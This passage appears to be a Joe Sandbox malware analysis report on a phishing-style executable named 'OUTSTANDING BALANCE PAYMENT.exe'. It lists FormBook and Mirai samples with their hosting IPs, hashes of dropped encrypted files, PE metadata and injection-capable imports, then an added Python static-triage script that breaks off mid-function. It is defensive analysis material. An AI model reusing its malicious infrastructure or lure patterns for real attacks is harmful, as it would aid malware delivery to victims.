POWERLINE-AS-APPOWERLINEDATACENTERHK | loligang.mips.elf | Get hash | malicious | Mirai | Browse
• 154.193.88.157
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 11-19AIS.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | ORIGINAL INVOICE COAU7230734290.exe | Get hash | malicious | FormBook | Browse
• 154.216.76.80
POWERLINE-AS-APPOWERLINEDATACENTERHK | Payroll List.exe | Get hash | malicious | FormBook | Browse
• 154.216.76.80
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 11-21AIS.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 1045-20-11.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 719A1120-2024.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | DOC_114542366.vbe | Get hash | malicious | FormBook | Browse
• 156.251.17.224
                                                                No context
                                                                No context
                                                                Process:C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):289280
                                                                Entropy (8bit):7.99458254036876
                                                                Encrypted:true
                                                                SSDEEP:6144:RCRsXvZKD+ckHKgep04FOteUnuyjV9/wouap6GN2T:6sXvsD+PHE/FOk2vwo32T
                                                                MD5:E348CB254457E2905C365D49A19B347E
                                                                SHA1:79D6ACB5406509D2440C47D98DE18F7DF1711EA8
                                                                SHA-256:B256DBB3444E48BDD1FD708EE7CAEED58EC486FEA8FB36191ADBEA2EBD005C30
                                                                SHA-512:08F1B198E0E9EF00D273D70E33B112F0E61AF0AF21372FC5A80642A94DB1FF1F2CD6D250A782F56FB9C61CB6360F3830AEED198AD7273E319246BA6F1FFF3D34
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:{..OWN93<O4J.36.COTN938.4J1R36WCOTN938O4J1R36WCOTN938O4J1R3.WCOZQ.=8.=...2z.b.<'J.H=[-C3^.4"!:!M.Z*.8D<._9c....^W+Qd<_9.WCOTN93AN=..2T.j#(.sYT.U...hSQ.Y....S_....V0..=-Q.X(.J1R36WCO..93tN5J.$.iWCOTN938.4H0Y2=WC.PN938O4J1Rs"WCODN93HK4J1.36GCOTL93>O4J1R36QCOTN938ODN1R16WCOTN;3x.4J!R3&WCOT^93(O4J1R3&WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J.&VN#COT:n78O$J1Rk2WC_TN938O4J1R36WCoTNY38O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O
                                                                Process:C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):289280
                                                                Entropy (8bit):7.99458254036876
                                                                Encrypted:true
                                                                SSDEEP:6144:RCRsXvZKD+ckHKgep04FOteUnuyjV9/wouap6GN2T:6sXvsD+PHE/FOk2vwo32T
                                                                MD5:E348CB254457E2905C365D49A19B347E
                                                                SHA1:79D6ACB5406509D2440C47D98DE18F7DF1711EA8
                                                                SHA-256:B256DBB3444E48BDD1FD708EE7CAEED58EC486FEA8FB36191ADBEA2EBD005C30
                                                                SHA-512:08F1B198E0E9EF00D273D70E33B112F0E61AF0AF21372FC5A80642A94DB1FF1F2CD6D250A782F56FB9C61CB6360F3830AEED198AD7273E319246BA6F1FFF3D34
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:{..OWN93<O4J.36.COTN938.4J1R36WCOTN938O4J1R36WCOTN938O4J1R3.WCOZQ.=8.=...2z.b.<'J.H=[-C3^.4"!:!M.Z*.8D<._9c....^W+Qd<_9.WCOTN93AN=..2T.j#(.sYT.U...hSQ.Y....S_....V0..=-Q.X(.J1R36WCO..93tN5J.$.iWCOTN938.4H0Y2=WC.PN938O4J1Rs"WCODN93HK4J1.36GCOTL93>O4J1R36QCOTN938ODN1R16WCOTN;3x.4J!R3&WCOT^93(O4J1R3&WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J.&VN#COT:n78O$J1Rk2WC_TN938O4J1R36WCoTNY38O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O
                                                                Process:C:\Windows\SysWOW64\bitsadmin.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                Category:dropped
                                                                Size (bytes):196608
                                                                Entropy (8bit):1.1239949490932863
                                                                Encrypted:false
                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.146871750593404
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:OUTSTANDING BALANCE PAYMENT.exe
                                                                File size:1'213'952 bytes
                                                                MD5:07bd00d307952e993352e5311a7fdf90
                                                                SHA1:05374cedfe58076e633a5968d2e29b8b5bf98e33
                                                                SHA256:50ff8e365c4211b6de55efdb7f73beed523f47eb35b0121ce7ea68c3c0739106
                                                                SHA512:ce3a2c1c6c935e30d42fb261c4365e8cb063e776bec4efba0a9b2d3155464915ff7324ac238b6e83768fc95e1c4fd0b084dc4cdc7b7ac3cafb488356ee853efd
                                                                SSDEEP:24576:4tb20pkaCqT5TBWgNQ7az3poxdWYigKlEX+qno6A:BVg5tQ7az3mZGEOx5
                                                                TLSH:0C45CF1373DD8361C3B25273BA657741BEBF782506A1F96B2FD8093DE920122521EA73
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                Icon Hash:aaf3e3e3938382a0
                                                                Entrypoint:0x425f74
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x67467000 [Wed Nov 27 01:04:00 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                Instruction
                                                                call 00007F95D8C4B0CFh
                                                                jmp 00007F95D8C3E0E4h
                                                                int3
                                                                int3
                                                                push edi
                                                                push esi
                                                                mov esi, dword ptr [esp+10h]
                                                                mov ecx, dword ptr [esp+14h]
                                                                mov edi, dword ptr [esp+0Ch]
                                                                mov eax, ecx
                                                                mov edx, ecx
                                                                add eax, esi
                                                                cmp edi, esi
                                                                jbe 00007F95D8C3E26Ah
                                                                cmp edi, eax
                                                                jc 00007F95D8C3E5CEh
                                                                bt dword ptr [004C0158h], 01h
                                                                jnc 00007F95D8C3E269h
                                                                rep movsb
                                                                jmp 00007F95D8C3E57Ch
                                                                cmp ecx, 00000080h
                                                                jc 00007F95D8C3E434h
                                                                mov eax, edi
                                                                xor eax, esi
                                                                test eax, 0000000Fh
                                                                jne 00007F95D8C3E270h
                                                                bt dword ptr [004BA370h], 01h
                                                                jc 00007F95D8C3E740h
                                                                bt dword ptr [004C0158h], 00000000h
                                                                jnc 00007F95D8C3E40Dh
                                                                test edi, 00000003h
                                                                jne 00007F95D8C3E41Eh
                                                                test esi, 00000003h
                                                                jne 00007F95D8C3E3FDh
                                                                bt edi, 02h
                                                                jnc 00007F95D8C3E26Fh
                                                                mov eax, dword ptr [esi]
                                                                sub ecx, 04h
                                                                lea esi, dword ptr [esi+04h]
                                                                mov dword ptr [edi], eax
                                                                lea edi, dword ptr [edi+04h]
                                                                bt edi, 03h
                                                                jnc 00007F95D8C3E273h
                                                                movq xmm1, qword ptr [esi]
                                                                sub ecx, 08h
                                                                lea esi, dword ptr [esi+08h]
                                                                movq qword ptr [edi], xmm1
                                                                lea edi, dword ptr [edi+08h]
                                                                test esi, 00000007h
                                                                je 00007F95D8C3E2C5h
                                                                bt esi, 03h
                                                                jnc 00007F95D8C3E318h
                                                                movdqa xmm1, dqword ptr [esi+00h]
                                                                Programming Language:
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [ASM] VS2012 UPD4 build 61030
                                                                • [RES] VS2012 UPD4 build 61030
                                                                • [LNK] VS2012 UPD4 build 61030
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb7004          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc4000          0x5f48c       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x124000         0x6c4c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x8d8d0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xb2730          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8d000          0x860         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy            Characteristics
.text   0x1000           0x8b54f       0x8b600   f437a6545e938612764dbb0a314376fc  False     0.5699499019058296   data       6.680413749210956  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8d000          0x2cc42       0x2ce00   827ffd24759e8e420890ecf164be989e  False     0.330464397632312    data       5.770192333189168  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xba000          0x9d54        0x6200    e0a519f8e3a35fae0d9c2cfd5a4bacfc  False     0.16402264030612246  data       2.002691099965349  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0xc4000          0x5f48c       0x5f600   b93354c1d77686772417e27ecd8215cf  False     0.9308880447247706   data       7.902101407002179  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x124000         0xa474        0xa600    0bc98f8631ef0bde830a7f83bb06ff08  False     0.5017884036144579   data       5.245426654116355  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA       Size     Type                                                                     Language  Country        ZLIB Complexity
RT_ICON        0xc45a8   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192           English   Great Britain  0.7466216216216216
RT_ICON        0xc46d0   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors  English  Great Britain  0.3277027027027027
RT_ICON        0xc47f8   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192           English   Great Britain  0.3885135135135135
RT_ICON        0xc4920   0x2e8    Device independent bitmap graphic, 32 x 64 x 4, image size 0             English   Great Britain  0.3333333333333333
RT_ICON        0xc4c08   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 0             English   Great Britain  0.5
RT_ICON        0xc4d30   0xea8    Device independent bitmap graphic, 48 x 96 x 8, image size 0             English   Great Britain  0.2835820895522388
RT_ICON        0xc5bd8   0x8a8    Device independent bitmap graphic, 32 x 64 x 8, image size 0             English   Great Britain  0.37906137184115524
RT_ICON        0xc6480   0x568    Device independent bitmap graphic, 16 x 32 x 8, image size 0             English   Great Britain  0.23699421965317918
RT_ICON        0xc69e8   0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 0            English   Great Britain  0.13858921161825727
RT_ICON        0xc8f90   0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 0            English   Great Britain  0.25070356472795496
RT_ICON        0xca038   0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 0            English   Great Britain  0.3173758865248227
RT_MENU        0xca4a0   0x50     data                                                                     English   Great Britain  0.9
RT_STRING      0xca4f0   0x594    data                                                                     English   Great Britain  0.3333333333333333
RT_STRING      0xcaa84   0x68a    data                                                                     English   Great Britain  0.2747909199522103
RT_STRING      0xcb110   0x490    data                                                                     English   Great Britain  0.3715753424657534
RT_STRING      0xcb5a0   0x5fc    data                                                                     English   Great Britain  0.3087467362924282
RT_STRING      0xcbb9c   0x65c    data                                                                     English   Great Britain  0.34336609336609336
RT_STRING      0xcc1f8   0x466    data                                                                     English   Great Britain  0.3605683836589698
RT_STRING      0xcc660   0x158    Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0         English   Great Britain  0.502906976744186
RT_RCDATA      0xcc7b8   0x56791  data                                                                     (none)    (none)         1.0003275050608003
RT_GROUP_ICON  0x122f4c  0x76     data                                                                     English   Great Britain  0.6610169491525424
RT_GROUP_ICON  0x122fc4  0x14     data                                                                     English   Great Britain  1.25
RT_GROUP_ICON  0x122fd8  0x14     data                                                                     English   Great Britain  1.15
RT_GROUP_ICON  0x122fec  0x14     data                                                                     English   Great Britain  1.25
RT_VERSION     0x123000  0xdc     data                                                                     English   Great Britain  0.6181818181818182
RT_MANIFEST    0x1230dc  0x3b0    ASCII text, with CRLF line terminators                                   English   Great Britain  0.5116525423728814
DLL: Imports
WSOCK32.dll: __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll: GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll: ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll: WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll: InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL: GetProcessMemoryInfo
IPHLPAPI.DLL: IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll: UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll: IsThemeActive
KERNEL32.dll: HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll: SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll: SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system  Country where language is spoken
English                         Great Britain
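The tables above give everything needed for the static cross-checks an analyst runs before deciding whether a PE is packed: does the entry point fall in an executable section, does each data directory really sit in the section claimed for it, which sections have entropy high enough to be compressed or encrypted, and how much of the resource directory is taken by one opaque blob. The Python below is an added worked example, not part of the Joe Sandbox report; its constants are transcribed from the header, section, data-directory and resource tables (entropy rounded to three decimals) and the checks are generic.

```python
"""Static PE triage over the header facts in the report tables above.

Added example (not part of the Joe Sandbox report). The constants are
transcribed from the report: entry point, section table, non-empty data
directories and the single RT_RCDATA resource. Entropy values are
rounded to three decimals. The checks themselves are generic.
"""
from dataclasses import dataclass

IMAGE_BASE = 0x400000
ENTRY_POINT = 0x425f74          # Entrypoint (virtual address) from the header table


@dataclass(frozen=True)
class Section:
    name: str
    va: int          # section RVA
    vsize: int       # virtual size
    rawsize: int     # raw (on-disk) size
    entropy: float   # Shannon entropy of the raw bytes, bits per byte
    chars: str       # IMAGE_SCN_* flags, abbreviated


SECTIONS = [
    Section(".text",  0x1000,   0x8b54f, 0x8b600, 6.680, "CODE|EXECUTE|READ"),
    Section(".rdata", 0x8d000,  0x2cc42, 0x2ce00, 5.770, "INITIALIZED_DATA|READ"),
    Section(".data",  0xba000,  0x9d54,  0x6200,  2.003, "INITIALIZED_DATA|READ|WRITE"),
    Section(".rsrc",  0xc4000,  0x5f48c, 0x5f600, 7.902, "INITIALIZED_DATA|READ"),
    Section(".reloc", 0x124000, 0xa474,  0xa600,  5.245, "INITIALIZED_DATA|DISCARDABLE|READ"),
]

# (directory, RVA, size, section the report says it is in); all-zero entries omitted
DATA_DIRECTORIES = [
    ("IMPORT",      0xb7004,  0x17c,   ".rdata"),
    ("RESOURCE",    0xc4000,  0x5f48c, ".rsrc"),
    ("BASERELOC",   0x124000, 0x6c4c,  ".reloc"),
    ("DEBUG",       0x8d8d0,  0x1c,    ".rdata"),
    ("LOAD_CONFIG", 0xb2730,  0x40,    ".rdata"),
    ("IAT",         0x8d000,  0x860,   ".rdata"),
]

RESOURCE_DIR_SIZE = 0x5f48c     # IMAGE_DIRECTORY_ENTRY_RESOURCE size
RCDATA_SIZE = 0x56791           # the one RT_RCDATA entry (ZLIB complexity 1.0)


def section_for_rva(rva, sections=SECTIONS):
    """Return the section whose virtual range contains rva, or None."""
    for s in sections:
        if s.va <= rva < s.va + s.vsize:
            return s
    return None


def entry_point_section():
    """Name of the section holding the entry point; None means outside every section."""
    s = section_for_rva(ENTRY_POINT - IMAGE_BASE)
    return s.name if s else None


def directory_mismatches(dirs=DATA_DIRECTORIES):
    """Directories whose range does not sit wholly in the section the table claims."""
    bad = []
    for name, rva, size, claimed in dirs:
        start = section_for_rva(rva)
        end = section_for_rva(rva + size - 1) if size else start
        if start is None or start.name != claimed or end is not start:
            bad.append(name)
    return bad


def section_findings(sections=SECTIONS, entropy_threshold=7.0):
    """Packing and obfuscation heuristics over the section table."""
    findings = []
    for s in sections:
        if s.entropy > entropy_threshold:
            findings.append(f"{s.name}: entropy {s.entropy:.2f} > {entropy_threshold} "
                            "(compressed or encrypted data)")
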